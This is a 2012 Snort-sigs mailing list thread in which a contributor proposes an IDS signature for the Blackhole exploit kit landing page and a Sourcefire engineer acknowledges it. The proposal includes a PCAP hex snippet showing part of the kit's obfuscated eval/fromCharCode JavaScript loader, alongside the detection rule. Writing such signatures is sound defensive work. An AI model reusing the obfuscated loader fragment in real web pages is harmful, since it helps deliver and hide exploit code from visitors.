Snort mailing list archives
Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"
From: Joel Esler <jesler () sourcefire com>
Date: Wed, 7 Mar 2012 11:01:23 -0500
Thanks Nathan, We'll take a look at this. -- Joel Esler Senior Research Engineer, VRT OpenSource Community Manager Sourcefire On Mar 7, 2012, at 10:55 AM, Community Proposed wrote:
Please see the below for a variant of the catch(qq hostile blackhole exploit kit initial landing. VRT -- PCAP en-route. Note 'origin community' in metadata, uncertain how the nomenclature for this will be. Not sure if 'origin vrt' and 'origin community' are what you had in mind. alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:"SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"; flow:to_client,established; file_data; content:")try{"; content:"prototype}catch(qq"; distance:0; metadata:policy balanced-ips drop, policy security-ips drop, service http, origin community; reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; classtype:attempted-user; sid:x; rev:1;) PCAP ASCII Snippet: 0x0470: 6d65 2e35 2e37 2e30 223e 3c2f 6f62 6a65 me.5.7.0"></obje 0x0480: 6374 3e3c 2f68 746d 6c3e 3c73 6372 6970 ct></html><scrip 0x0490: 743e 6966 2877 696e 646f 772e 646f 6375 t>if(window.docu 0x04a0: 6d65 6e74 2974 7279 7b6e 6577 2261 222e ment)try{new"a". 0x04b0: 7072 6f74 6f74 7970 657d 6361 7463 6828 prototype}catch( 0x04c0: 7171 7129 7b7a 7a3d 2765 7661 6c27 3b73 qqq){zz='eval';s 0x04d0: 733d 5b5d 3b61 613d 5b5d 2b30 3b61 6161 s=[];aa=[]+0;aaa 0x04e0: 3d30 2b5b 5d3b 6966 2861 612e 696e 6465 =0+[];if(aa.inde 0x04f0: 784f 6628 6161 6129 3d3d 3d30 297b 663d xOf(aaa)===0){f= 0x0500: 2766 726f 6d43 6861 7227 3b66 2b3d 2743 'fromChar';f+='C 0x0510: 6f64 6527 3b7d 6565 3d27 6527 3b65 3d77 ode';}ee='e';e=w 0x0520: 696e 646f 775b 7a7a 5d3b 743d 2779 273b indow[zz];t='y'; 0x0530: 7d68 3d4d 6174 682e 6174 616e 3228 332c }h=Math.atan2(3, 0x0540: 3029 2f4d 6174 682e 5049 2a2d 343b 6e3d 0)/Math.PI*-4;n= 0x0550: 2233 2e35 7033 2e35 7035 312e 3570 3530 "3.5p3.5p51.5p50 0x0560: 7031 3570 3139 7034 3970 3534 2e35 7034 p15p19p49p54.5p4 0x0570: 382e 3570 3537 2e35 7035 332e 3570 3439 8.5p57.5p53.5p49 0x0580: 2e35 7035 3470 3537 7032 3270 3530 2e35 .5p54p57p22p50.5 0x0590: 7034 392e 3570 3537 7033 332e 3570 3533 p49.5p57p33.5p53 0x05a0: 7034 392e 3570 3533 2e35 7034 392e 3570 p49.5p53.5p49.5p 0x05b0: 3534 7035 3770 3536 2e35 7033 3270 3539 54p57p56.5p32p59 Thanks, Nathan
------------------------------------------------------------------------------ Virtualization & Cloud Management Using Capacity Planning Cloud computing makes use of virtualization - but cloud computing also focuses on allowing computing to be delivered as a service. http://www.accelacomm.com/jaw/sfnl/114/51521223/ _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq" Community Proposed (Mar 07)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq" Joel Esler (Mar 07)